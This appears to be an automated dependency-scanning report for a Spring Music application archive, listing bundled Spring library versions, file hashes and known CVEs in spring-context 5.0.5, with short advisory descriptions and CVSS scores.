Evidence Type Source Name Value Confidence Vendor central artifactid spring-cloud-connectors-core Highest Vendor central groupid org.springframework.cloud Highest Vendor file name spring-cloud-connectors-core High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name cloud Low Vendor jar package name service Low Vendor jar package name springframework Low Vendor pom artifactid spring-cloud-connectors-core Low Vendor pom developer email cschaefer@pivotal.io Low Vendor pom developer email rladdad@gopivotal.com Low Vendor pom developer email sfrederick@pivotal.io Low Vendor pom developer id cschaefer Medium Vendor pom developer id ramnivas Medium Vendor pom developer id sfrederick Medium Vendor pom developer name Chris Schaefer Medium Vendor pom developer name Ramnivas Laddad Medium Vendor pom developer name Scott Frederick Medium Vendor pom groupid org.springframework.cloud Highest Vendor pom name Spring Cloud Connectors Core High Vendor pom organization name Spring IO High Vendor pom organization url https://spring.io Medium Vendor pom url http://projects.spring.io/spring-cloud Highest Product central artifactid spring-cloud-connectors-core Highest Product file name spring-cloud-connectors-core High Product jar package name cloud Low Product jar package name service Low Product pom artifactid spring-cloud-connectors-core Highest Product pom developer email cschaefer@pivotal.io Low Product pom developer email rladdad@gopivotal.com Low Product pom developer email sfrederick@pivotal.io Low Product pom developer id cschaefer Low Product pom developer id ramnivas Low Product pom developer id sfrederick Low Product pom developer name Chris Schaefer Low Product pom developer name Ramnivas Laddad Low Product pom developer name Scott Frederick Low Product pom groupid org.springframework.cloud Highest Product pom name Spring Cloud Connectors Core High Product pom organization name Spring IO Low Product pom organization url https://spring.io Low Product pom url http://projects.spring.io/spring-cloud Medium Version central version 2.0.1.RELEASE Highest Version pom version 2.0.1.RELEASE Highest
spring-music-sqldb-1.0.jar: spring-cloud-spring-service-connector-2.0.1.RELEASE.jarDescription:
Spring Cloud Connectors Spring Service Connectors License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-spring-service-connector-2.0.1.RELEASE.jar
MD5: c098887d14db24e752a8dfaf744d35f8
SHA1: 5a114c00eb26b68b88a8c8d1948cadbd8d24d634
SHA256: 37625da0a07fe04e19c249addef52c766445acac2283083429d51ccadd4ee6ac
Evidence Type Source Name Value Confidence Vendor central artifactid spring-cloud-spring-service-connector Highest Vendor central groupid org.springframework.cloud Highest Vendor file name spring-cloud-spring-service-connector High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name cloud Low Vendor jar package name service Low Vendor jar package name springframework Low Vendor pom artifactid spring-cloud-spring-service-connector Low Vendor pom developer email cschaefer@pivotal.io Low Vendor pom developer email rladdad@gopivotal.com Low Vendor pom developer email sfrederick@pivotal.io Low Vendor pom developer id cschaefer Medium Vendor pom developer id ramnivas Medium Vendor pom developer id sfrederick Medium Vendor pom developer name Chris Schaefer Medium Vendor pom developer name Ramnivas Laddad Medium Vendor pom developer name Scott Frederick Medium Vendor pom groupid org.springframework.cloud Highest Vendor pom name Spring Cloud Connectors Spring Service Connectors High Vendor pom organization name Spring IO High Vendor pom organization url https://spring.io Medium Vendor pom url http://projects.spring.io/spring-cloud Highest Product central artifactid spring-cloud-spring-service-connector Highest Product file name spring-cloud-spring-service-connector High Product jar package name cloud Low Product jar package name service Low Product pom artifactid spring-cloud-spring-service-connector Highest Product pom developer email cschaefer@pivotal.io Low Product pom developer email rladdad@gopivotal.com Low Product pom developer email sfrederick@pivotal.io Low Product pom developer id cschaefer Low Product pom developer id ramnivas Low Product pom developer id sfrederick Low Product pom developer name Chris Schaefer Low Product pom developer name Ramnivas Laddad Low Product pom developer name Scott Frederick Low Product pom groupid org.springframework.cloud Highest Product pom name Spring Cloud Connectors Spring Service Connectors High Product pom organization name Spring IO Low Product pom organization url https://spring.io Low Product pom url http://projects.spring.io/spring-cloud Medium Version central version 2.0.1.RELEASE Highest Version pom version 2.0.1.RELEASE Highest
spring-music-sqldb-1.0.jar: spring-context-5.0.5.RELEASE.jarDescription:
Spring Context License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-context-5.0.5.RELEASE.jar
MD5: 0b5681097790036a3244012f825b60db
SHA1: 9cca4bf5acb693249a01c218f471c677b951d6e2
SHA256: 82dd82e805cdebf55103e4bcb67c85d766665ee33a15b7f4b033863477d26a1e
Evidence Type Source Name Value Confidence Vendor central artifactid spring-context Highest Vendor central groupid org.springframework Highest Vendor file name spring-context High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name context Highest Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.context Medium Vendor pom artifactid spring-context Low Vendor pom developer email jhoeller@pivotal.io Low Vendor pom developer id jhoeller Medium Vendor pom developer name Juergen Hoeller Medium Vendor pom groupid org.springframework Highest Vendor pom name Spring Context High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-framework Medium Vendor pom url spring-projects/spring-framework Highest Product central artifactid spring-context Highest Product file name spring-context High Product hint analyzer product springsource_spring_framework Highest Product jar package name context Highest Product Manifest automatic-module-name spring.context Medium Product Manifest Implementation-Title spring-context High Product pom artifactid spring-context Highest Product pom developer email jhoeller@pivotal.io Low Product pom developer id jhoeller Low Product pom developer name Juergen Hoeller Low Product pom groupid org.springframework Highest Product pom name Spring Context High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-framework Low Product pom url spring-projects/spring-framework High Version central version 5.0.5.RELEASE Highest Version Manifest Implementation-Version 5.0.5.RELEASE High Version pom version 5.0.5.RELEASE Highest
CVE-2022-22965 suppress
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258 suppress
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259 suppress
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11040 suppress
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398 suppress
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1257 suppress
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421 suppress
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950 suppress
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2023-20861 suppress
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11039 suppress
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22968 suppress
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-22970 suppress
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2025-22233 (OSSINDEX) suppress
CVE-2024-38820 ensured Locale-independent, lowercase conversion for both the configured disallowedFields patterns and for request parameter names. However, there are still cases where it is possible to bypass the disallowedFields checks.
Affected Spring Products and Versions
Spring Framework:
* 6.2.0 - 6.2.6
* 6.1.0 - 6.1.19
* 6.0.0 - 6.0.27
* 5.3.0 - 5.3.42
* Older, unsupported versions are also affected
Mitigation
Users of affected versions should upgrade to the corresponding fixed version.
Affected version(s)Fix Version Availability 6.2.x
6.2.7
OSS6.1.x
6.1.20
OSS6.0.x
6.0.28
Commercial https://enterprise.spring.io/ 5.3.x
5.3.43
Commercial https://enterprise.spring.io/
No further mitigation steps are necessary.
Generally, we recommend using a dedicated model object with properties only for data binding, or using constructor binding since constructor arguments explicitly declare what to bind together with turning off setter binding through the declarativeBinding flag. See the Model Design section in the reference documentation.
For setting binding, prefer the use of allowedFields (an explicit list) over disallowedFields.
Credit
This issue was responsibly reported by the TERASOLUNA Framework Development Team from NTT DATA Group Corporation.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-22233 for details CWE-20 Improper Input Validation
CVSSv2:
Base Score: LOW (2.299999952316284) Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-context:5.0.5.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: spring-core-5.0.5.RELEASE.jarDescription:
Spring Core License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-core-5.0.5.RELEASE.jar
MD5: 988f815ea07b27f70cc2932c4b8c8392
SHA1: 1bd9feb1d9dac6accd27f5244b6c47cfcb55045c
SHA256: 49fd3a5ae95ad46cd3b43302150246fdb4abeb1f99fad0ea8c843ec79092ba69
